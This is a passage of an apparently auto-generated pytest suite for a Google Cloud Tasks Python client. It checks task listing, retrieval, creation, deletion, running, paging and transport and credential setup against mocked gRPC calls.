_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListTasksAsyncPager)
assert response.next_page_token == "next_page_token_value"
def test_list_tasks_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ListTasksRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.list_tasks), "__call__") as call:
call.return_value = cloudtasks.ListTasksResponse()
client.list_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_tasks_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ListTasksRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.list_tasks), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.ListTasksResponse()
)
await client.list_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_list_tasks_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.list_tasks), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.ListTasksResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_tasks(parent="parent_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == "parent_value"
def test_list_tasks_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_tasks(
cloudtasks.ListTasksRequest(), parent="parent_value",
)
@pytest.mark.asyncio
async def test_list_tasks_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.list_tasks), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.ListTasksResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.ListTasksResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_tasks(parent="parent_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == "parent_value"
@pytest.mark.asyncio
async def test_list_tasks_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_tasks(
cloudtasks.ListTasksRequest(), parent="parent_value",
)
def test_list_tasks_pager():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials,)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.list_tasks), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListTasksResponse(
tasks=[task.Task(), task.Task(), task.Task(),], next_page_token="abc",
),
cloudtasks.ListTasksResponse(tasks=[], next_page_token="def",),
cloudtasks.ListTasksResponse(tasks=[task.Task(),], next_page_token="ghi",),
cloudtasks.ListTasksResponse(tasks=[task.Task(), task.Task(),],),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)),
)
pager = client.list_tasks(request={})
assert pager._metadata == metadata
results = [i for i in pager]
assert len(results) == 6
assert all(isinstance(i, task.Task) for i in results)
def test_list_tasks_pages():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials,)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.list_tasks), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListTasksResponse(
tasks=[task.Task(), task.Task(), task.Task(),], next_page_token="abc",
),
cloudtasks.ListTasksResponse(tasks=[], next_page_token="def",),
cloudtasks.ListTasksResponse(tasks=[task.Task(),], next_page_token="ghi",),
cloudtasks.ListTasksResponse(tasks=[task.Task(), task.Task(),],),
RuntimeError,
)
pages = list(client.list_tasks(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_tasks_async_pager():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials,)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.list_tasks),
"__call__",
new_callable=mock.AsyncMock,
) as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListTasksResponse(
tasks=[task.Task(), task.Task(), task.Task(),], next_page_token="abc",
),
cloudtasks.ListTasksResponse(tasks=[], next_page_token="def",),
cloudtasks.ListTasksResponse(tasks=[task.Task(),], next_page_token="ghi",),
cloudtasks.ListTasksResponse(tasks=[task.Task(), task.Task(),],),
RuntimeError,
)
async_pager = await client.list_tasks(request={},)
assert async_pager.next_page_token == "abc"
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, task.Task) for i in responses)
@pytest.mark.asyncio
async def test_list_tasks_async_pages():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials,)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.list_tasks),
"__call__",
new_callable=mock.AsyncMock,
) as call:
# Set the response to a series of pages.
call.side_effect = (
cloudtasks.ListTasksResponse(
tasks=[task.Task(), task.Task(), task.Task(),], next_page_token="abc",
),
cloudtasks.ListTasksResponse(tasks=[], next_page_token="def",),
cloudtasks.ListTasksResponse(tasks=[task.Task(),], next_page_token="ghi",),
cloudtasks.ListTasksResponse(tasks=[task.Task(), task.Task(),],),
RuntimeError,
)
pages = []
async for page_ in (await client.list_tasks(request={})).pages:
pages.append(page_)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
def test_get_task(transport: str = "grpc", request_type=cloudtasks.GetTaskRequest):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.get_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task(
name="name_value",
dispatch_count=1496,
response_count=1527,
view=task.Task.View.BASIC,
app_engine_http_request=target.AppEngineHttpRequest(
http_method=target.HttpMethod.POST
),
)
response = client.get_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.GetTaskRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.dispatch_count == 1496
assert response.response_count == 1527
assert response.view == task.Task.View.BASIC
def test_get_task_from_dict():
test_get_task(request_type=dict)
@pytest.mark.asyncio
async def test_get_task_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.GetTaskRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.get_task), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
task.Task(
name="name_value",
dispatch_count=1496,
response_count=1527,
view=task.Task.View.BASIC,
)
)
response = await client.get_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.dispatch_count == 1496
assert response.response_count == 1527
assert response.view == task.Task.View.BASIC
def test_get_task_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.GetTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.get_task), "__call__") as call:
call.return_value = task.Task()
client.get_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_task_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.GetTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.get_task), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
await client.get_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_get_task_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.get_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
def test_get_task_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_task(
cloudtasks.GetTaskRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_get_task_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.get_task), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
@pytest.mark.asyncio
async def test_get_task_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_task(
cloudtasks.GetTaskRequest(), name="name_value",
)
def test_create_task(
transport: str = "grpc", request_type=cloudtasks.CreateTaskRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.create_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_task.Task(
name="name_value",
dispatch_count=1496,
response_count=1527,
view=gct_task.Task.View.BASIC,
app_engine_http_request=target.AppEngineHttpRequest(
http_method=target.HttpMethod.POST
),
)
response = client.create_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.CreateTaskRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gct_task.Task)
assert response.name == "name_value"
assert response.dispatch_count == 1496
assert response.response_count == 1527
assert response.view == gct_task.Task.View.BASIC
def test_create_task_from_dict():
test_create_task(request_type=dict)
@pytest.mark.asyncio
async def test_create_task_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.CreateTaskRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.create_task), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gct_task.Task(
name="name_value",
dispatch_count=1496,
response_count=1527,
view=gct_task.Task.View.BASIC,
)
)
response = await client.create_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, gct_task.Task)
assert response.name == "name_value"
assert response.dispatch_count == 1496
assert response.response_count == 1527
assert response.view == gct_task.Task.View.BASIC
def test_create_task_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.CreateTaskRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.create_task), "__call__") as call:
call.return_value = gct_task.Task()
client.create_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_create_task_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.CreateTaskRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.create_task), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_task.Task())
await client.create_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_create_task_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.create_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gct_task.Task()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_task(
parent="parent_value", task=gct_task.Task(name="name_value"),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == "parent_value"
assert args[0].task == gct_task.Task(name="name_value")
def test_create_task_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_task(
cloudtasks.CreateTaskRequest(),
parent="parent_value",
task=gct_task.Task(name="name_value"),
)
@pytest.mark.asyncio
async def test_create_task_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.create_task), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = gct_task.Task()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gct_task.Task())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_task(
parent="parent_value", task=gct_task.Task(name="name_value"),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].parent == "parent_value"
assert args[0].task == gct_task.Task(name="name_value")
@pytest.mark.asyncio
async def test_create_task_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_task(
cloudtasks.CreateTaskRequest(),
parent="parent_value",
task=gct_task.Task(name="name_value"),
)
def test_delete_task(
transport: str = "grpc", request_type=cloudtasks.DeleteTaskRequest
):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.delete_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.delete_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.DeleteTaskRequest()
# Establish that the response is the type that we expect.
assert response is None
def test_delete_task_from_dict():
test_delete_task(request_type=dict)
@pytest.mark.asyncio
async def test_delete_task_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.DeleteTaskRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.delete_task), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.delete_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert response is None
def test_delete_task_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.DeleteTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.delete_task), "__call__") as call:
call.return_value = None
client.delete_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_task_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.DeleteTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.delete_task), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
await client.delete_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_delete_task_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.delete_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
def test_delete_task_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_task(
cloudtasks.DeleteTaskRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_delete_task_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.delete_task), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = None
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
@pytest.mark.asyncio
async def test_delete_task_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_task(
cloudtasks.DeleteTaskRequest(), name="name_value",
)
def test_run_task(transport: str = "grpc", request_type=cloudtasks.RunTaskRequest):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.run_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task(
name="name_value",
dispatch_count=1496,
response_count=1527,
view=task.Task.View.BASIC,
app_engine_http_request=target.AppEngineHttpRequest(
http_method=target.HttpMethod.POST
),
)
response = client.run_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.RunTaskRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.dispatch_count == 1496
assert response.response_count == 1527
assert response.view == task.Task.View.BASIC
def test_run_task_from_dict():
test_run_task(request_type=dict)
@pytest.mark.asyncio
async def test_run_task_async(transport: str = "grpc_asyncio"):
client = CloudTasksAsyncClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = cloudtasks.RunTaskRequest()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.run_task), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
task.Task(
name="name_value",
dispatch_count=1496,
response_count=1527,
view=task.Task.View.BASIC,
)
)
response = await client.run_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the response is the type that we expect.
assert isinstance(response, task.Task)
assert response.name == "name_value"
assert response.dispatch_count == 1496
assert response.response_count == 1527
assert response.view == task.Task.View.BASIC
def test_run_task_field_headers():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.RunTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.run_task), "__call__") as call:
call.return_value = task.Task()
client.run_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_run_task_field_headers_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.RunTaskRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.run_task), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
await client.run_task(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_run_task_flattened():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client._transport.run_task), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.run_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
def test_run_task_flattened_error():
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.run_task(
cloudtasks.RunTaskRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_run_task_flattened_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client._client._transport.run_task), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = task.Task()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(task.Task())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.run_task(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].name == "name_value"
@pytest.mark.asyncio
async def test_run_task_flattened_error_async():
client = CloudTasksAsyncClient(credentials=credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.run_task(
cloudtasks.RunTaskRequest(), name="name_value",
)
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.CloudTasksGrpcTransport(
credentials=credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(), transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.CloudTasksGrpcTransport(
credentials=credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = CloudTasksClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide scopes and a transport instance.
transport = transports.CloudTasksGrpcTransport(
credentials=credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = CloudTasksClient(
client_options={"scopes": ["1", "2"]}, transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.CloudTasksGrpcTransport(
credentials=credentials.AnonymousCredentials(),
)
client = CloudTasksClient(transport=transport)
assert client._transport is transport
def test_transport_get_channel():
# A client may be instantiated with a custom transport instance.
transport = transports.CloudTasksGrpcTransport(
credentials=credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
transport = transports.CloudTasksGrpcAsyncIOTransport(
credentials=credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
def test_transport_grpc_default():
# A client should use the gRPC transport by default.
client = CloudTasksClient(credentials=credentials.AnonymousCredentials(),)
assert isinstance(client._transport, transports.CloudTasksGrpcTransport,)
def test_cloud_tasks_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(exceptions.DuplicateCredentialArgs):
transport = transports.CloudTasksTransport(
credentials=credentials.AnonymousCredentials(),
credentials_file="credentials.json",
)
def test_cloud_tasks_base_transport():
# Instantiate the base transport.
with mock.patch(
"google.cloud.tasks_v2beta3.services.cloud_tasks.transports.CloudTasksTransport.__init__"
) as Transport:
Transport.return_value = None
transport = transports.CloudTasksTransport(
credentials=credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
"list_queues",
"get_queue",
"create_queue",
"update_queue",
"delete_queue",
"purge_queue",
"pause_queue",
"resume_queue",
"get_iam_policy",
"set_iam_policy",
"test_iam_permissions",
"list_tasks",
"get_task",
"create_task",
"delete_task",
"run_task",
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
def test_cloud_tasks_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(
auth, "load_credentials_from_file"
) as load_creds, mock.patch(
"google.cloud.tasks_v2beta3.services.cloud_tasks.transports.CloudTasksTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
load_creds.return_value = (credentials.AnonymousCredentials(), None)
transport = transports.CloudTasksTransport(
credentials_file="credentials.json", quota_project_id="octopus",
)
load_creds.assert_called_once_with(
"credentials.json",
scopes=("https://www.googleapis.com/auth/cloud-platform",),
quota_project_id="octopus",
)
def test_cloud_tasks_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(auth, "default") as adc:
adc.return_value = (credentials.AnonymousCredentials(), None)
CloudTasksClient()
adc.assert_called_once_with(
scopes=("https://www.googleapis.com/auth/cloud-platform",),
quota_project_id=None,
)
def test_cloud_tasks_transport_auth_adc():
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(auth, "default") as adc:
adc.return_value = (credentials.AnonymousCredentials(), None)
transports.CloudTasksGrpcTransport(
host="squid.clam.whelk", quota_project_id="octopus"
)
adc.assert_called_once_with(
scopes=("https://www.googleapis.com/auth/cloud-platform",),
quota_project_id="octopus",
)
def test_cloud_tasks_host_no_port():
client = CloudTasksClient(
credentials=credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(
api_endpoint="cloudtasks.googleapis.com"
),
)
assert client._transport._host == "cloudtasks.googleapis.com:443"
